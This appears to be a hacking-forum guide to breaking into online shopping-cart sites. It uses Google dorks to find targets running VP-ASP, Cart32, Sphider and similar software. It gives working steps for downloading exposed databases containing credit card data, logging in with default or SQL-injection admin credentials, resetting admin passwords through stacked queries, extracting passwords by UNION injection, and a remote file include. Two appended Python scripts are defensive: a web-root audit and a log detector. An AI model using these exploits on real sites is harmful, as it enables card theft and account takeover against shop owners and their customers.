Type: VP-ASP Shopping Cart
Version: 5.00
How to find VP-ASP 5.00 sites hmmm, Good Q.
Finding VP-ASP 5.00 sites is so simple...
Go to google.com
and type.
intitle:VP-ASP Shopping Cart 5.00
You will find many websites with VP-ASP 5.00 cart software installed
Now let's go to the exploit..
Source: Internet
the page will be like this > ****://***.victim.com/shop/shopdisplaycategories.asp
The exploit is : diag_dbtest.asp
so do this>
****://***.victim.com/shop/diag_dbtest.asp
A page will appear containing these:
xDatabase
shopping140
xDblocation
resx
xdatabasetype, xEmail, xEmailName, xEmailSubject, xEmailSystem, xEmailType, xOrdernumber
.:. EXAMPLE .:.
the most important thing here is xDatabase
xDatabase: shopping140
ok now the URL will be like this:
****://***.victim.com/shop/shopping140.mdb
if you didn't download the Database..
Try this while there is dblocation.
xDblocation
resx
the url will be:
****://***.victim.com/shop/resx/shopping140.mdb
If you see the error message, you have to try this:
****://***.victim.com/shop/shopping500.mdb
Download the mdb file; you should be able to open it with any mdb file viewer, which you should be able to find at download.com.
Inside you should be able to find credit card information,
and you should even be able to find the admin username and password for the website.
The admin login page is usually located here:
****://***.victim.com/shop/shopadmin.asp
If you cannot find the admin username and password in the mdb file, or you can but they are incorrect, or you cannot find the mdb file at all, then try to find the admin login page and enter the default passwords, which are:
Username: admin
password: admin
OR
Username: vpasp
password: vpasp
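From the site owner's side, everything above depends on a diagnostic page and the Access database sitting inside the served directory. The following audit is an added example, not part of the original post: it walks a web root and reports those files, using the script names and extensions this page mentions; the sample directory layout is constructed for the demo.

```python
import os
import tempfile

# Names and extensions are the ones this page mentions; the rule set is an assumption.
DIAG_SCRIPTS = {"diag_dbtest.asp", "shopdbtest.asp", "dbsetup.asp"}
DATA_EXTENSIONS = {".mdb", ".c32"}
DATA_FILES = {"order.log"}

def audit_webroot(root):
    """Return sorted (relative_path, reason) pairs for files that should not be web-served."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            lower = name.lower()
            rel = os.path.relpath(os.path.join(dirpath, name), root).replace(os.sep, "/")
            if lower in DIAG_SCRIPTS:
                findings.append((rel, "diagnostic/setup script left deployed"))
            elif os.path.splitext(lower)[1] in DATA_EXTENSIONS or lower in DATA_FILES:
                findings.append((rel, "data file inside the web root"))
    return sorted(findings)

def build_sample_site(root):
    """Create a constructed sample layout for the demo; not a real installation."""
    for rel in ("shop/shopdisplaycategories.asp", "shop/diag_dbtest.asp",
                "shop/shopping140.mdb", "shop/resx/shopping140.mdb"):
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        open(path, "w").close()

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        build_sample_site(root)
        for rel, reason in audit_webroot(root):
            print(f"{rel}: {reason}")
```

Any hit means the file is one request away from being downloaded: move the database outside the web root, delete the diagnostic scripts, and change the default admin credentials.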
-------------------------------------------
Google Dork :---> allinurl:/shopadmin.asp
Target looks like :--> http://www.xxxxxx.com/xxxx/shopadmin.asp
Now you need to know xdatabase
To know xdatabase you need to rename shopadmin.asp to shopdbtest.asp
target looks like :--> http://www.xxxxxx.com/xxxx/shopdbtest.asp
So the xdatabase is shopping350
Now exploit is http://www.xxxxx.com/xxxx/shopping350.mdb
Save the Database
Database Contains CCs
--------------------------------------------------
google dork :--> allinurl:/cart32.exe/
target looks :--> http://www.xxxxxx.net/wrburns_s/cgi-bin ... oItemFound
change NoItemFound with error
When an error page appears with installation information beneath it, it means we were successful!
If shares this was gotten list file the format/the suffix.C32 significant in site.Gotten file contained the data cc
Copy some file.C32 was or all of them to notepad or the program text the other editor.
The substitute string url tsb.To like this: http://www.xxxxxx.net/wrburns_s/cgi-bin/cart32/
paste one by one, file.C32 at the end url has been modified earlier, with the format http://www.xxxxx.com/cart32/
----------------------------------------------------
google dork :--> inurl:"/cart.php?m="
target looks like :--> http://xxxxxxx.com/store/cart.php?m=view
exploit: change cart.php?m=view to /admin
target with exploit :--> http://xxxxxx.com/store/admin
Username : 'or"="
Password : 'or"="
---------------------------------------------------------
google dork :--> allinurlroddetail.asp?prod=
target looks like :--> http://www.xxxxx.org/proddetail.asp?prod=XXXX (big letters and numbers)
exploit :--> change the proddetail.asp?prod=SG369 with fpdb/vsproducts.mdb
target with exploit :--> http://www.xxxxxx.org/fpdb/vsproducts.mdb
------------------------------------------------------------
google dork :--> allinurl: /cgi-local/shopper.cgi
target looks like :--> http://www.xxxxxx.com/cgi-local/shopper ... ction&key=
exploit :--> ...&template=order.log
target with exploit :--> http://www.xxxxxxxx.com/cgi-local/shopp ... =order.log
---------------------------------------------------------------
google dork :--> allinurl:/vpasp/shopsearch.asp
When you find a target, put this in the search box:
Keyword=&category=5); insert into tbluser (fldusername) values
('')--&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword='' where
fldusername=''--&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess='1' where
fldusername=''--&SubCategory=All&action.x=33&action.y=6
Don't forget to replace and ; what you set them to is up to you.
To change the admin password, enter the following keyword:
Keyword=&category=5); update tbluser set fldpassword='' where
fldusername='admin'--&SubCategory=All&action.x=33&action.y=6
login page: http://xxxxxxx/vpasp/shopadmin.asp
------------------------------------------------------------
google.com:--> allinurl:/shop/category.asp/catid=
target looks like :--> http://www.xxxxx.com/shop/category.asp/catid=xxxxxx
exploit :--> /admin/dbsetup.asp
target with exploit :--> http://www.xxxxxx.com/admin/dbsetup.asp
after getting that page look for dbname and path. (this is also good file sdatapdshoppro.mdb , access.mdb)
target for downloading the database :--> http://www.xxxxxx.com/data/pdshoppro.mdb (doesn't need to be like this)
in the db look for access to find the password and username of shop admins.
-----------------------------------------------------------
1/search google: allinurl:" shopdisplayproducts.asp?id=
--->http://victim.com/shopdisplayproducts.asp?id=5
2/find error by adding '
---> http://victim.com/shopdisplayproducts.asp?id=5'
--->error: Microsoft JET database engine error "80040e14"...../shop$db.asp, line467
-If you don't see an error then change id to cat
--->http://victim.com/shopdisplayproducts.asp?cat=5'
3/if this shop has error then add this: %20union%20select%201%20from%20tbluser\"having%201 = 1--sp_password
--->http://victim.com/shopdisplayproduct...on%20select%201%20from%20tbluser\"having%201=1--sp_password
--->error: 5' union select 1 from tbluser \"having 1=1--sp_password.... The number ofcolumn in the two selected tables or queries of a union queries do not match......
4/ add 2,3,4,5,6.......until you see a nice table
add 2
---->http://victim.com/shopdisplayproduct...on%20select%201,2%20from%20tbluser\"having%201=1--sp_password
then 3
---->http://victim.com/shopdisplayproduct...on%20select%201,2,3%20from%20tbluser\"having%201=1--sp_password
then 4 ---->http://victim.com/shopdisplayproduct...on%20select%201,2,3,4%20from%20tbluser\"having%201=1--sp_password
...5,6,7,8,9.... until you see a table. (exp:...47)
----> http://victim.com/shopdisplayproducts.a ... 0select%20 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,,43,44,45,46,47%20from%20tbluser\ " having%201=1--sp_password
---->see a table.
5/When you see a table, change 4 to fldusername and 22 to fldpassword you will have the admin username and password
---> http://victim.com/shopdisplayproducts.a ... 20%20elect% 201,2,3,fldusername,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,fldpassword,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47%20from%20tbluser%22having%201=1--sp_password
6/Find link admin to login:
try this first: http://victim.com/shopadmin.asp
or: http://victim.com/shopadmin1.asp
Doesn't work? Then you have to find it yourself:
add: (for the above example) '%20union%20select%201,2,3,fieldvalue,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration\"h a ving%201=1--sp_password
--->http://victim.com/shopdisplayproduct...n%20select%201,2,3,fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration\"h a ving%201=1--sp_password
you'll see something like: ( lot of them)
shopaddmoretocart.asp
shopcheckout.asp
shopdisplaycategories.asp
..............
Then guess the admin link by adding the data above until you find the admin links.
--------------------------------------------------------------
Sphider Version 1.2.x (include_dir) remote file include
# script Vendor: http://cs.ioc.ee/~ando/sphider/
# Discovered by: IbnuSina
found on index.php
$include_dir = "./include"; // <--- no patch here
$language_dir = "./languages";
include "$include_dir/index_header.inc";
include "$include_dir/conf.php";
include "$include_dir/connect.php";
exploitz : http://targe.lu/[sphiderpath]/index.php?include_dir=injekan.lu?
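Every technique listed on this page leaves a distinctive request in the web server's access log. The detector below is an added example, not part of the original post: it flags those requests and separates probes from requests the server actually answered. The log lines are constructed, the Common Log Format is assumed, and the rule names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

DIAG = ("diag_dbtest.asp", "shopdbtest.asp", "dbsetup.asp")  # names from this page; rules are assumptions
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) [^"]*" (\d{3})')
SQLI = re.compile(r"union\s+select|\)\s*;\s*(insert|update)\s|'\s*or\b", re.I)

def classify(target):
    """Return the rule names matched by a request target (path plus query)."""
    parts = urlsplit(target)
    path = unquote_plus(parts.path).lower()
    params = parse_qs(parts.query, keep_blank_values=True)
    hits = []
    if path.endswith(DIAG):
        hits.append("diagnostic-script")
    if path.endswith((".mdb", ".c32")):
        hits.append("data-file-download")
    if SQLI.search(unquote_plus(parts.query)):
        hits.append("sql-in-query")
    if "include_dir" in params:
        hits.append("include_dir-override")
    if any(v.lower().endswith(".log") for v in params.get("template", [])):
        hits.append("template-points-at-log")
    return hits

def scan(lines):
    """Return (client, status, target, rules) for every line that matches a rule."""
    found = []
    for line in lines:
        m = REQUEST.match(line)
        if m and (rules := classify(m.group(2))):
            found.append((m.group(1), int(m.group(3)), m.group(2), rules))
    return found

def served(found):
    """Data files or diagnostic pages answered with 200: confirmed exposure."""
    return [t for _, st, t, rules in found
            if st == 200 and {"diagnostic-script", "data-file-download"} & set(rules)]

SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /shop/diag_dbtest.asp HTTP/1.1" 200 512
203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /shop/shopping140.mdb HTTP/1.1" 404 0
203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /shop/resx/shopping140.mdb HTTP/1.1" 200 904
198.51.100.4 - - [01/Jan/2024:11:00:00 +0000] "GET /shopdisplayproducts.asp?id=5'%20union%20select%201%20from%20tbluser HTTP/1.1" 500 0
198.51.100.4 - - [01/Jan/2024:11:02:00 +0000] "GET /sphider/index.php?include_dir=x HTTP/1.1" 200 10
192.0.2.10 - - [01/Jan/2024:12:00:00 +0000] "GET /shop/shopdisplaycategories.asp HTTP/1.1" 200 2048
""".splitlines()  # constructed sample lines, not real traffic

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

A 200 on a `.mdb` or diagnostic request means the data was handed out and the stored card data and admin credentials should be treated as compromised; 404 and 500 responses indicate probing that did not return the file.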